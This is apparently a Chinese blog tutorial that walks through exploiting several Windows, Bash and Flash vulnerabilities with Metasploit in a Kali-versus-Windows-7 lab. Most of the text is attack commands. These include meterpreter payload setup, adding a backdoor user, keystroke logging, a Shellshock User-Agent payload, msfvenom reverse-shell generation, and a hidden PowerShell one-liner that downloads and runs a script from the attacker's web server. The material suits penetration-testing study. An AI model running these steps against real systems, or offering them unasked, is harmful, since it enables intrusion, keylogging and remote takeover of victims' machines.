MSF 漏洞利用

MSF 漏洞利用

MS08-067漏洞

漏洞简介

MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括
测试阶段的Windows 7 Pro-Beta。
如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。
在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验
证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火
墙配置有助于保护网络资源免受从企业外部发起的攻击。

漏洞利用

msfconsole    //输入msfconsole进入msf终端
 
search ms08-067  //查找ms08-067漏洞利用模块
 
use exploit/windows/smb/ms08_067_netapi  //使用查找出来的攻击模块
 
set payload windows/meterpreter/bind_tcp  //设置攻击payload
 
set RHOSTS your_ip  //设置靶机地址
 
show targets  //查看targets
 
set tartget 34  //选择攻击目标
 
show options  //查看配置
 
exploit  //执行exploit攻击
 

进入Windows Shell

shell
net user // 查看用户
net user magedu3 123 /add //添加用户
 
 
使用键盘记录
ps      使用 ps 查看进程 
migrate 1392   //使用ps找到合适的进程进行迁移,迁移到有管理员权限的进程
使用 keyscan_start 开启键盘记录:
meterpreter > keyscan_start
Starting the keystroke sniffer ...
 
在XP系统中任意输入字符,使用 keyscan_dump 进行查看(keyscan_stop 关闭键盘记录)
 
 

MS10-018漏洞

漏洞简介

此安全更新可解决 Internet Explorer 中九个秘密报告的漏洞和一个公开披露的漏洞。 最严重的漏洞可
能在用户使用 Internet Explorer 查看特制网页时允许远程执行代码。详细信息

漏洞利用

msfconsole
search ms10_018
use exploit/windows/browser/ms10_018_ie_behaviors
 
set srvhost 192.168.0.110 //设置web服务ip,这里是Kali的地址
set uripath magedu //设置uri路径
options //查看配置
 
exploit //攻击
 
xp机器访问对应的URL http://192.168.0.110:8080/magedu ;访问之后会闪退
 
msf会接收到session
 
查看session
sessions -l
使用session
sessions -i 3
 
思考:如何利用该漏洞?
 
 
 

MS17-010漏洞(永恒之蓝)

漏洞简介

MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0
(SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。
此MS17-0101漏洞主要是针对于Windows7及以前的操作系统。

漏洞利用

msfconsole //进入 msf
search 17-010 //查找ms17-010漏洞利用模块可
 
use exploit/windows/smb/ms17_010_psexec //使用攻击模块
set RHOSTS 192.168.0.102 //设置攻击IP
exploit //攻击
shell \\进入Windows cmd
 
 

扩展内容

1、Win7系统下的MS17-010利用条件:
  • 防火墙必须允许SMB流量出入
  • 目标必须使用SMBv1协议
  • 目标必须缺少MS17-010补丁
  • 目标必须允许匿名IPC $和管道名
 
2、MS17-010的五个漏洞利用模块:
  • 0 exploit/windows/smb/ms17_010_eternalblue
  • 1 exploit/windows/smb/ms17_010_psexec
  • 2 auxiliary/admin/smb/ms17_010_command
  • 3 auxiliary/scanner/smb/smb_ms17_010(扫描目标系统有没有漏洞,不进行利用获取)
  • 4 exploit/windows/smb/smb_doublepulsar_rce(SMB后门,不用关注)
利用条件:0模块不需要开启共享就能直接打,1、2则需要开启共享之后才能攻击成功。
返回结果:0、1都能反弹shell进行命令控制,2只能返回命令执行的结果。
 
 
 
 

Bash Shellshock CVE-2014-6271(破壳)

漏洞简介

Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞,启动Bash的时候,它不但会导入这
个函数,而且也会把函数定义后面的命令执行。在有些CGI脚本的设计中,数据是通过环境变量来传递
的,这样就给了数据提供者利用Shellshock漏洞的机会。
简单来说就是由于服务器的cgi脚本调用了bash命令,由于bash版本过低,攻击者把有害数据写入环境
变量,传到服务器端,触发服务器运行Bash脚本,完成攻击。
 

漏洞原理

该 Bash 使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以 (){ 开头定义的环境变量在命
令 ENV 中解析成函数后, Bash 执行并未退出,而是继续解析并执行shell命令。

漏洞利用

环境搭建

docker下直接search该漏洞镜像
docker search CVE-2014-6271
docker ps //查看容器是否启动
看到容器启动成功之后,访问 your_ip:8080 看到环境服务启动
 

漏洞攻击

使用Hackbar发送http请求,将payload附在User-Agent中执行,随后访问/cgi-bin/vulnerable:
User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id
 
漏洞解析:
1.设置环境变量,以 () { 开头;
2.启动子shell;
3.子shell会继承父进程的环境变量,并且当环境变量是以 () { 开头的,会当函数执行;
 

使用msf进行利用

使用 msfconsole 进入 msf 终端
search shellshock \\查找 shellshock 漏洞利用模块
use exploit/multi/http/apache_mod_cgi_bash_env_exec \\使用漏洞利用模块
options 查看设置参数
 
set payload linux/x86/meterpreter/reverse_tcp // 设置漏洞利用payload
set RHOSTS your_ip // 设置远程服务地址
set rport 80 // 设置远程服务端口
set TARGETURI /victim.cgi // 设置目标URI
check // 查看是否存在漏洞
exploit // 攻击
 
 

(震网三代)远程命令执行漏洞 CVE-2017-8464

漏洞描述

2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷
方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用
户系统,安全风险高危.
Windows系统使用二进制解析.LNK文件,当恶意二进制代码被系统识别执行时即可实现远程代码执
行,由于是在explorer.exe进程中运行,所以 load 进内存时与当前用户具有相同权限。
攻击者利用这一解析过程将包含恶意二进制的代码被附带进可移动驱动器(或远程共享过程中),受害
者使用powershell解析 .LNK 文件后即被黑客所控制。
成功利用此漏洞的攻击者可能会获得与本地用户相同的用户权限。

影响版本

cpe:2.3⭕microsoft:windows_10:-:*:*:*:*:*:*:* Show Matching CPE(s)
cpe:2.3⭕microsoft:windows_10:1511:*:*:*:*:*:*:* Show Matching CPE(s)
cpe:2.3⭕microsoft:windows_10:1607:*:*:*:*:*:*:* Show Matching CPE(s)
cpe:2.3⭕microsoft:windows_10:1703:*:*:*:*:*:*:* Show Matching CPE(s)
cpe:2.3⭕microsoft:windows_7:-:sp1:*:*:*:*:*:* Show Matching CPE(s)
cpe:2.3⭕microsoft:windows_8.1:-:*:*:*:*:*:*:* Show Matching CPE(s)
cpe:2.3⭕microsoft:windows_rt_8.1:-:*:*:*:*:*:*:* Show Matching CPE(s)
cpe:2.3⭕microsoft:windows_server_2008:-:sp2:*:*:*:*:*:* Show Matching CPE(s)
cpe:2.3⭕microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:* Show Matching CPE(s)
cpe:2.3⭕microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:* Show Matching CPE(s)
cpe:2.3⭕microsoft:windows_server_2012:-:*:*:*:*:*:*:* Show Matching CPE(s)
cpe:2.3⭕microsoft:windows_server_2012:r2:*:*:*:*:*:*:* Show Matching CPE(s)
cpe:2.3⭕microsoft:windows_server_2016:-:*:*:*:*:*:*:* Show Matching CPE(s)
 

漏洞利用

1.在kali下使用 msfvenom 生成一个反弹shell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.111 lport=4444 -
f psh-reflection > ~/magedu.ps1
 
2.将生成的magedu.ps1拷贝到/var/www/html目录下
cp ~/magedu.ps1 /var/www/html/
 
3.在kali中启动Apache服务
service apache2 start //默认80端口
 
4.在win7系统中查看服务是否启动
 
5.访问web下的magedu.ps1
 
6.在靶机上创建一个快捷方式,并输入:
1
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.111/magedu.ps1');test.ps1"

  

7.kali下创建监听反弹shell
1
use exploit/multi/handler   //侦听模块 <br>set payload windows/x64/meterpreter/reverse_tcp <br>set LHOST 192.168.0.111 <br>show options

  

8.kali上使用 exploit 开启监听
exploit
 
9.windows上运行创建的powershell快捷方式
 
10.kali上接收到反弹shell
 
 

CVE-2018-4878漏洞

漏洞简介

2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版
本,存在高危漏洞(CVE-2018-4878)。
攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执
行”,并且直接被getshell。
参考链接:https://blog.51cto.com/chenxinjie/2093653

影响版本

漏洞利用

漏洞环境

  • Kali Linux + Windows 7 sp1
  • 渗透机:Kali Linux
  • 靶机:Windows 7 sp1
  • exp:cve-2018-4878.py
  • flash:flashplayer_activex_28.0.0.137.exe

攻击流程

1.在kali中使用 msfvenom 生成漏洞利用代码
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.111 lport=4445 -f <br>python>magedu_shellcode.txt

  

2.查看生成的文件
cat ~/magedu_shellcode.txt
 
3.修改 CVE-2018-4878-master 文件夹中的 cve-2018-4878.py 文件
 
4.修改cve-2018-4878.py文件中的文件生成路径为自己的路径
 
5.运行python脚本
python cve-2018-4878.py
 
6.开启Apache服务,并将生成的两个文件拷贝到apache服务目录下
1
2
service apache2 start
sudo cp /home/magedu/Desktop/* /var/www/html //(即exploit.swf和index.html)
 
7.在kali上开启监听
 
msfconsole 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
# 注意地址和端口要和 msfvenom 命令生存时使用的一致 
set lhost 192.168.0.111 
set lport 4445 
exploit # 开启监听

    

8.Win7系统安装flash插件
 
9.使用IE浏览器访问kali中我们生成好的 index2.html 页面
 
10.kaili中获得win7机器权限
exploit
 
posted @   小橘了个橘  阅读(709)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
点击右上角即可分享
微信分享提示